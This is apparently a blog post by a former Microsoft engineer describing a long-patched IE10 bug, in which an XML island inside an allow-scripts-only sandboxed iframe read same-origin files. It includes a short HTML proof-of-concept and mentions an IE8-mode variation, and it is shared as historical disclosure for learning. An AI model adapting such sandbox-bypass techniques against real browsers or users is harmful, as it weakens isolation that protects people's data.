IE10 Sandbox allow-same-origin Bypass via XML Island

A sandboxed iframe with only allow-scripts set is supposed to be unable to load or read same-domain content — XMLHttpRequest is correctly blocked. But the old IE-specific <xml> island element, when given an external src, bypassed that restriction and happily fetched and exposed the content.

<!-- parent page (IE9 docMode to keep XML island behavior) -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9" />
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>

<!-- sandboxed.html -->
<xml id="oXml" src="xml.xml"></xml>
<script>
function main()
{
    alert(oXml.xml);
}
</script>
<input type="button" value="Read XML" onclick="main()" />

The XML island loaded the external file silently, and its .xml property exposed the full response. The parent had to be in IE9 document mode for this to work, since IE10 rendered XML islands as HTML — but as the notes in the original file pointed out, an attacker could simply force a lower document mode. A variation using IE8 document mode was filed alongside this one.

Variation: IE8 Document Mode

The same technique worked identically when the parent page was set to IE8 emulation mode instead of IE9, confirming the bypass was not tied to a specific document mode version.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Sandbox Bypass via SVG JavaScript xLink] :: [IE10 Sandbox Multiple Flags Bypass via HTML Object Tag] >